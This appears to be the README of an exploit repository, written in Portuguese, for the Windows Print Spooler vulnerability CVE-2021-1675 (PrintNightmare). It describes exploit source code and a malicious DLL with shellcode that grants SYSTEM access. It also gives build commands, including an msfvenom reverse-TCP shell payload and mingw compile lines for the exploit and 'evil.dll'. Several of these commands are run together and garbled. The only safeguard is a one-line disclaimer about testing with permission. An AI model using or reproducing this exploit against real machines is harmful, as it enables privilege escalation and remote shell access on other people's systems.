
Exploit local de escalonamento de privilégios para CVE-2021-1675 (PrintNightmare) que instala uma DLL maliciosa para obter acesso SYSTEM em sistemas Windows vulneráveis.
src/nightmare.cpp: código-fonte para explorar CVE-2021-1675 e obter acesso de sistema
instalando uma dll maliciosa
src/payload-dll.cpp: código-fonte para dll com shellcode malicioso na função de entrada
!!Use apenas contra servidores nos quais você tem permissão para testar
CVE-2021-1675 é uma vulnerabilidade no Serviço de Fila de Impressão (Print Spooler Service) do Microsoft Windows que permite a um atacante contornar a verificação de SeLoadDriverPrivilege. Isso pode ser explorado para obter escalação de privilégio na máquina alvo instalando uma DLL maliciosa que chama shellcode ou usa a API do Windows para estabelecer uma conexão de shell reverso. Versões do Windows 10/8/Server 2008/Server 2012 anteriores a 8 de junho de 2021 são afetadas.
$ msfvenom -p windows/shell/reverse_tcp EXITFUNC=THREAD LHOST=127.0.0.1 LPORT=4444 -f cx86_64-w64-mingw32-g++-win32 -o ./src/nightmare.o -c -g -Wall ./src/nightmare.cpp
x86_64-w64-mingw32-g++-win32 -o ./bin/PrintNightmareLPE.exe ./src/nightmare.o -lws2_32 -static-libgcc -static-libstdc++ -lole32 -lwinspoolx86_64-w64-mingw32-g++ src/payload-dll.cpp -lws2_32 -o lib/evil.dll -sharedzip ./bin/PrinterNightmareLPE.exe ./lib/